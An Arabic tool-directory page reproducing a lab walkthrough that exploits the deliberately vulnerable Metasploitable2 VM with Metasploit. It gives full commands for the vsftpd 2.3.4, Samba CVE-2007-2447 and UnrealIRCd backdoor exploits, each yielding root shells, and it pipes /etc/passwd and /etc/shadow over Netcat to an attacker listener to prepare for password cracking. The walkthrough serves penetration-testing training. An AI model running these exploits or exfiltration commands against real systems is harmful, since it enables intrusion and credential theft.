Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
metasploitable2-exploitation-metasploit — دليل استغلال كامل باستخدام Metasploit ضد Metasploitable2 — باب خلفي لـ vsftpd، وSamba CVE-2007-2447، وباب خلفي لـ UnrealIRCd، وتسريب عبر Netcat، وتحضير تكسير بيانات الاعتماد. | Kitploit
أدوات/GitHubGitHub/ethicalhackinglabs/metasploitable2-exploitation-metasploit
كسر كلمات المرورالاستطلاعأطر الاستغلالتخطيط الشبكةتحليل الثغرات الأمنيةالاستغلالتسريب البياناتاختبار الاختراقالقيادة والسيطرة

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
التعلم والتعليم
تطوير الحمولات
مختبرات وتدريب عملي
GitHubethicalhackinglabs/metasploitable2-exploitation-metasploit

metasploitable2-exploitation-metasploit

دليل استغلال كامل باستخدام Metasploit ضد Metasploitable2 — باب خلفي لـ vsftpd، وSamba CVE-2007-2447، وباب خلفي لـ UnrealIRCd، وتسريب عبر Netcat، وتحضير تكسير بيانات الاعتماد.

عرض المستودع
9منذ 2 أشهرلم تتم المراجعة بعد

استغلال Metasploitable2 باستخدام Metasploit: VSFTPD و Samba وأكثر

دليل عملي لاستغلال الثغرات باستخدام إطار Metasploit — بدءًا من إعداد قاعدة بيانات PostgreSQL وفحص db_nmap، مرورًا بثلاث واجهات شل صلبة عبر vsftpd و Samba و UnrealIRCd، وصولًا إلى استخراج بيانات الاعتماد باستخدام Netcat.


نظرة عامة

يوثق هذا المستودع جلسة استغلال كاملة باستخدام Metasploit ضد Metasploitable2 في مختبر معزول على VirtualBox. المواضيع التي يغطيها:

  • إعداد Metasploit مع محرك PostgreSQL ومساحات عمل
  • تشغيل db_nmap لحفظ نتائج الفحص مباشرة في قاعدة البيانات
  • استغلال الباب الخلفي في vsftpd 2.3.4 (اختراق سلسلة التوريد)
  • استغلال Samba CVE-2007-2447 (حقن أوامر usermap_script)
  • استخراج ملفات /etc/passwd و /etc/shadow عبر Netcat ودمجها باستخدام unshadow
  • استغلال الباب الخلفي في UnrealIRCd 3.2.8.1

بيئة المختبر

الجهازالدورعنوان IP
Kali Linux 2026.1المهاجم192.168.1.4
Metasploitable2الهدف192.168.1.3

الشبكة: 192.168.1.0/24 — شبكة NAT معزولة بالكامل داخل VirtualBox.


الخطوة 1 — إعداد Metasploit والفحص المدعوم بقاعدة البيانات

root@kitploit:~
# تشغيل PostgreSQL وإعداد قاعدة البيانات (مرة واحدة فقط)
sudo systemctl start postgresql
sudo msfdb init

# تشغيل Metasploit
msfconsole

تشغيل Kali و Metasploitable2

تحديث Kali وبدء PostgreSQL

root@kitploit:~
msf6> db_status           # التحقق: متصل بـ msf. نوع الاتصال: postgresql.
msf6> workspace -a 178-metasploitable2
msf6> workspace           # تأكيد مساحة العمل النشطة

مخرجات db_status و workspace

root@kitploit:~
msf6> db_nmap -A 192.168.1.0/24 -n

فحص db_nmap قيد التقدم

root@kitploit:~
msf6> hosts
msf6> services

مخرجات hosts و services

تم العثور على خادمي FTP على Metasploitable2:

المنفذالخدمةالمعلومات
21/tcpftpvsftpd 2.3.4
2121/tcpftpProFTPD 1.3.1

الخطوة 2 — استغلال vsftpd 2.3.4 (باب خلفي)

في يوليو 2011، تم اختراق أرشيف المصدر لـ vsftpd 2.3.4 — تم إدخال باب خلفي يفتح واجهة شل صلبة على المنفذ 6200 عندما يحتوي اسم مستخدم FTP على :). CVE: CVE-2011-2523. الفرق في الشفرة: https://pastebin.com/AetT9sS5

root@kitploit:~
msf6> search type:exploit name:vsftpd
# النتيجة: exploit/unix/ftp/vsftpd_234_backdoor  (الترتيب: ممتاز)

msf6> use exploit/unix/ftp/vsftpd_234_backdoor
msf6> info

معلومات استغلال vsftpd - الجزء 1

معلومات استغلال vsftpd - الجزء 2

عرض خيارات vsftpd

تحديد RHOSTS RPORT LHOST في vsftpd

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> set RPORT 21
msf6> set LHOST 192.168.1.4
msf6> exploit

تنفيذ استغلال vsftpd وجلسة Meterpreter

ls على نظام الملفات الجذر عن بُعد

root@kitploit:~
meterpreter> shell
whoami          # root
uname -a        # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

مخرجات whoami root و uname -a

استخراج كلمات المرور المشفرة:

root@kitploit:~
cat /etc/shadow | grep '$1'

ملف shadow مع كلمات المرور المشفرة


الخطوة 3 — استغلال Samba (CVE-2007-2447)

إصدارات Samba 3.0.0–3.0.25rc3 تمرر أحرفًا وصفية للقشرة في حقل اسم المستخدم مباشرة إلى /bin/sh عبر خيار username map script — قبل حدوث المصادقة. يعمل Metasploitable2 على Samba 3.0.20-Debian.

root@kitploit:~
msf6> search type:exploit name:samba
# تم العثور على ~7 استغلالات

msf6> use exploit/multi/samba/usermap_script
msf6> info

قائمة استغلالات Samba من البحث

معلومات usermap_script لـ Samba

وصف CVE لـ Samba ومراجع

root@kitploit:~
msf6> set RHOSTS 192.168.1.3
msf6> exploit

تنفيذ استغلال Samba - فتح جلسة

whoami root و smbd --version على واجهة Samba

root@kitploit:~
whoami          # root
smbd --version  # Version 3.0.20-Debian

استخراج الملفات عبر Netcat

العلامة التبويبية 2 — Kali (الاستقبال):

root@kitploit:~
nc -l -p 4567 > passwd.txt

العلامة التبويبية 1 — واجهة الاستغلال (الإرسال):

root@kitploit:~
cat /etc/passwd | nc 192.168.1.4 4567

مستمع Netcat على Kali يستقبل passwd

محتويات passwd.txt بعد الاستخراج

كرر العملية مع /etc/shadow، ثم ادمج:

root@kitploit:~
unshadow passwd.txt shadow.txt > metasploitable_logins.txt
cat metasploitable_logins.txt

الخطوة 4 — استغلال UnrealIRCd 3.2.8.1 (باب خلفي)

تم توزيع UnrealIRCd 3.2.8.1 مع باب خلفي في شفرته المصدرية. إرسال AB إلى المنفذ 6667 يجعل الخادم ينفذ أي أمر لاحق كجذر — دون الحاجة إلى مصادقة.

root@kitploit:~
msf6> use exploit/unix/irc/unreal_ircd_3281_backdoor
msf6> set payload cmd/unix/bind_netcat
msf6> set RHOSTS 192.168.1.3
msf6> set LHOST 192.168.1.4
msf6> set RPORT 6667
msf6> exploit

خيارات استغلال UnrealIRCd وتنفيذه

واجهة شل جذر UnrealIRCd - whoami و uname -a

root@kitploit:~
whoami   # root
uname -a # Linux metasploitable 2.6.24-16-server #1 SMP Thu Apr 10 13:58:00 UTC 2008 i686 GNU/Linux

الخيارات المطلوبة:


سير عمل Metasploit بنظرة سريعة

root@kitploit:~
db_nmap → hosts → services → search → use → info → show options → set → exploit → shell

الأخطاء الشائعة


النقاط الرئيسية

  • vsftpd 2.3.4 و UnrealIRCd 3.2.8.1 كانا كلاهما اختراقًا لسلسلة التوريد — أبواب خلفية مخبوزة في أرشيفات التوزيع الرسمية
  • CVE-2007-2447 في Samba ينشط قبل المصادقة — التصحيح هو الحل الوحيد للتخفيف
  • Netcat لا يتطلب تبعيات ويعمل لاستخراج الملفات عبر أي نظام Unix تقريبًا
  • info قبل exploit عادة تستحق البناء — فهي تُظهر CVE والإصدارات المتأثرة والخيارات المطلوبة

🌐 تواصل معي

LinkedIn Dev.to

تنزيل الأداة
الخيارالقيمةالوصف
RHOSTS192.168.1.3عنوان IP الهدف
RPORT6667منفذ IRC الافتراضي
LHOST192.168.1.4عنوان IP لمستمع Kali
payloadcmd/unix/bind_netcatواجهة شل مقيدة عبر Netcat
الخطأما يحدثالإصلاح
تخطي msfdb initلا توجد قاعدة بيانات — لا يتم حفظ نتائج الفحصقم بتشغيل sudo msfdb init مرة واحدة قبل الاستخدام الأول
عدم تعيين LHOSTلا يوجد مكان لاتصال الواجهة العكسيةقم دائمًا بتعيين LHOST إلى عنوان IP الخاص بـ Kali
تشغيل msfdb init في كل جلسةيحل محل البيانات الموجودةقم بتشغيله مرة واحدة فقط؛ تحقق باستخدام sudo msfdb status
منفذ RPORT خاطئفشل الاستغلال بصمتتأكد من المنفذ من services قبل التعيين
إغلاق مستمع Netcat مبكرًانقل ملف مبتورانتظر لحظة بعد أمر الأنبوب قبل الضغط على CTRL-C
تخطي unshadowرافضات كلمات المرور ترفض تنسيق الملف المقسمادمج passwd + shadow أولاً دائمًا